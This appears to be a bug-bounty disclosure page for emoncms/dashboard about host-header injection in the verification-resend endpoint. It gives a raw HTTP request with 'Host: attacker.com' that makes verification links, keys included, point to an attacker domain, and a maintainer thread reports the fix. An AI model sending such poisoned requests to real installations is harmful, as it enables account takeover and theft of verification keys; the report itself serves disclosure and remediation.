Misinterpretation of Input in emoncms/dashboard

Valid

Reported on

Jul 22nd 2021

💥 BUG

account takeover via host-header injection It allow attacker to change url of account-verification link and verify any email-address .

💥 STEP TO REPRODUCE

1. First as attacker create a account with email abc@gmail.com. You dont own that email-address .
You cant login untill you verify that email address. But you are not owner of that email .
Now attacker send bellow account-verify request

GET /user/resend-verify.json?&username=bounty HTTP/1.1
Host: attacker.com
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Connection: close
Referer: https://emonsdfcms.org/
Cookie: PHPSESSID=juvfp27bj0234ib10irro8a06e

Here in this request header see i put Host: attacker-domain.com and send the request .
Now vicitm email address will received a verification link like https://attacker-domain.com/user/verify?email=yagefix460@dedatre.com&key=49939b70ea5ee9979a67376d47d59a7b .
Here in this url see attacker domain . When vicitm will open his mail and click that verification link then verification code will be sent to attacker-domain .\

Occurrences

dashboard_list.php L184

We have contacted a member of the emoncms/dashboard team and are waiting to hear back 2 years ago

ranjit-git modified the report

2 years ago

A emoncms/dashboard maintainer validated this vulnerability 2 years ago

ranjit-git has been awarded the disclosure bounty

The fix bounty is now up for grabs

A emoncms/dashboard maintainer marked this as fixed with commit 58af4f 2 years ago

The fix bounty has been dropped

This vulnerability will not receive a CVE

A emoncms/dashboard maintainer

commented 2 years ago

Maintainer

I've fixed this vulnerability in the core emoncms/emoncms repository:

https://github.com/emoncms/emoncms/commit/09ca537f4c99ae157fa1eea450c77c979867f2fe

Thanks a lot for notifying me of this vulnerability!

A emoncms/dashboard maintainer

commented 2 years ago

Maintainer

The fix suggests that the user set's their emoncms domain manually in the emoncms settings file which ensures that $_SERVER['HOST'] is not used to discover the installations domain name.

to join this conversation

We have contacted a member of the emoncms/dashboard team and are waiting to hear back 2 years ago

ranjit-git modified the report

2 years ago

A emoncms/dashboard maintainer validated this vulnerability 2 years ago

ranjit-git has been awarded the disclosure bounty

The fix bounty is now up for grabs

A emoncms/dashboard maintainer marked this as fixed with commit 58af4f 2 years ago

The fix bounty has been dropped

This vulnerability will not receive a CVE

A emoncms/dashboard maintainer

commented 2 years ago

Maintainer

I've fixed this vulnerability in the core emoncms/emoncms repository:

https://github.com/emoncms/emoncms/commit/09ca537f4c99ae157fa1eea450c77c979867f2fe

Thanks a lot for notifying me of this vulnerability!

A emoncms/dashboard maintainer

commented 2 years ago

Maintainer

The fix suggests that the user set's their emoncms domain manually in the emoncms settings file which ensures that $_SERVER['HOST'] is not used to discover the installations domain name.

to join this conversation